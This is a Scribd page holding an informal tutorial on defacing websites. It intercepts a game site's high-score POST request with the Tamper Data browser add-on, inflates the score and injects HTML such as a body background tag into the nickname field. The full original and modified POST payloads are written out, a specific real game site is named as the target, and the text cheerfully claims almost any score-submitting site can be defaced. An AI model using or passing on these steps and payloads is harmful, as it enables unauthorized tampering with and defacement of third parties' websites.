Scribd Logo
Upload

Welcome to Scribd!

  • How To Deface With Tamper Data

    Uploaded by

    Charlotte Dörner
    36 views4 pages
    The document describes how to use the Tamper Data Firefox add-on to deface websites by modifying the POST data used to submit high scores. It provides an example of changing the high score and nickname fields on a game site to insert HTML that adds a blue background color. The response also notes that many sites have insecure high score files that allow writing, so defacing is possible on almost any site that allows score submissions.

    Original Description:

    Original Title

    How to Deface With Tamper Data

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document describes how to use the Tamper Data Firefox add-on to deface websites by modifying the POST data used to submit high scores. It provides an example of changing the high score and nickname fields on a game site to insert HTML that adds a blue background color. The response also notes that many sites have insecure high score files that allow writing, so defacing is possible on almost any site that allows score submissions.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    36 views4 pages

    How To Deface With Tamper Data

    Uploaded by

    Charlotte Dörner
    The document describes how to use the Tamper Data Firefox add-on to deface websites by modifying the POST data used to submit high scores. It provides an example of changing the high score and nickname fields on a game site to insert HTML that adds a blue background color. The response also notes that many sites have insecure high score files that allow writing, so defacing is possible on almost any site that allows score submissions.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 4

    How to deface with Tamper Data

    Download firefox -> mozilla.org -> go addons.mozilla.com -> Search: Tamper Data
    Download & install ..

    Q: How do i find a website what i can "deface/change" via Tamper Data?


    A: Think about online games. Where you can submit high scores.

    Example:
    www.littlecitygames.com/index.htm?play=leakypetesapt&gw=550&gh=400#game

    On this game .. catch 1 or more drupples.. then make yourself game over, so you see
    the next page:

    Open Tamper Data and click: Start Tamper


    Then on that page, fill in your name.. and click Submit High Score
    Then Tamper Data will popup:
    Click on Tamper , and the next will popup:

    Copy everything what is in POST_DATA:


    highScore=7&emailName=&nickName=darkcoke&score=7&fallSpeed=4&lives
    =1&checkLives=true&bgMusic=%5Bobject+Object%5D&alrightSND=
    %5Bobject+Object%5D&callmeSND=%5Bobject+Object%5D&heySND=%5Bobject
    +Object%5D&leakypeteSND=%5Bobject+Object%5D&soggySND=%5Bobject
    +Object%5D&YeehawSND=%5Bobject+Object%5D&dripSND=%5Bobject+Object
    %5D&buttonSND=%5Bobject+Object%5D&splashSND=%5Bobject+Object
    %5D&pbSND=%5Bobject+Object%5D&pipSqueekSND=%5Bobject+Object
    %5D&soundFX=true&soundfxInt=false&music=false&musicInt=false&oldHi
    ghScore=7
    Then paste it in your favorite text editor.. like notepad here..

    Then change highscore from 7 to 19000 for example, and nickName=darkcoke to


    something with HTML like <body bgcolor="#0000FF"> (Blue background color)

    PS: Change all highscore to the same .. so every 7 to 19000

    Then you have something like this:


    highScore=19000&emailName=&nickName=<body
    bgcolor="#0000FF">&score=19000&fallSpeed=4&lives=1&checkLives=true
    &bgMusic=%5Bobject+Object%5D&alrightSND=%5Bobject+Object
    %5D&callmeSND=%5Bobject+Object%5D&heySND=%5Bobject+Object
    %5D&leakypeteSND=%5Bobject+Object%5D&soggySND=%5Bobject+Object
    %5D&YeehawSND=%5Bobject+Object%5D&dripSND=%5Bobject+Object
    %5D&buttonSND=%5Bobject+Object%5D&splashSND=%5Bobject+Object
    %5D&pbSND=%5Bobject+Object%5D&pipSqueekSND=%5Bobject+Object
    %5D&soundFX=true&soundfxInt=false&music=false&musicInt=false&oldHi
    ghScore=19000

    Replace the content in the POST_DATA box (in tamper data) with the text what
    we've changed and click ok, then a popup will come up:

    Click OK. And keep click submit until the page is done with loading.. lets say : until you
    see this:

    You see my nickname darkc0ke , and the blue background :P


    Q: Can I put my name after the 19000 ?
    A: Sure , just put your name after nickName and paste the HTML in it..

    like:
    highScore=19000&emailName=&nickName=darkcoke<body
    bgcolor="#0000FF">&score=19000&fallSpeed=4&lives=1&checkLives=true
    &bgMusic=%5Bobject+Object%5D&alrightSND=%5Bobject+Object
    %5D&callmeSND=%5Bobject+Object%5D&heySND=%5Bobject+Object
    %5D&leakypeteSND=%5Bobject+Object%5D&soggySND=%5Bobject+Object
    %5D&YeehawSND=%5Bobject+Object%5D&dripSND=%5Bobject+Object
    %5D&buttonSND=%5Bobject+Object%5D&splashSND=%5Bobject+Object
    %5D&pbSND=%5Bobject+Object%5D&pipSqueekSND=%5Bobject+Object
    %5D&soundFX=true&soundfxInt=false&music=false&musicInt=false&oldHi
    ghScore=19000

    Some sites are a bit less secure, so maybe you can put your background in it ... but
    you have to learn that HTML part by yourself.

    Q: Is this possible to every site?


    A: Almost everything , because the *highscore*.php file, have write permissions to
    everyone (else people cant submit their score!) so you are allowed to write to their
    document.

    Happy "deface" :D

    You might also like